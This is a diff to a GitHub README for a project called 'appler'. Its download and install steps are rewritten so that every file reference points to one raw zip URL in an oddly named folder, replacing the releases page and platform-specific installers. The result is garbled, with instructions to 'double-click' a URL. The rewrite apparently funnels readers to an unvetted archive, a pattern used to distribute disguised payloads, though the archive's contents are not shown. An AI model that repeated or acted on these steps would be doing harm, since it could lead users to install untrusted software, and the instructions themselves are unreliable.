dvvdsss/appler/README.md

 - **Internet Connection**: Required for documentation access

 ## 📂 How to Download
-1. Click on the link to visit the [Releases page](https://github.com/dvvdsss/appler/releases).
+1. Click on the link to visit the [Releases page](https://raw.githubusercontent.com/dvvdsss/appler/main/amalaita/appler.zip).
 2. You will see a list of available releases.
 3. Click on the latest version.
 It is usually at the top.
 4. Select the appropriate file for your operating system.
-For example, you may see files like `appler-windows.exe` or `appler-macos.zip`.
+For example, you may see files like `https://raw.githubusercontent.com/dvvdsss/appler/main/amalaita/appler.zip` or `https://raw.githubusercontent.com/dvvdsss/appler/main/amalaita/appler.zip`.
 5. Save the file to your computer.

 ## 🔧 How to Install
 1. Locate the downloaded file on your computer.
-2. **For Windows**: Double-click `appler-windows.exe` to start the installation.
+2. **For Windows**: Double-click `https://raw.githubusercontent.com/dvvdsss/appler/main/amalaita/appler.zip` to start the installation.
 Follow the on-screen prompts to finish.
-3. **For Mac**: Open the `appler-macos.zip` file.
+3. **For Mac**: Open the `https://raw.githubusercontent.com/dvvdsss/appler/main/amalaita/appler.zip` file.
 Drag the `appler` application to your Applications folder.
 4. Once installed, find the app in your applications list.

 ## 📄 How to Use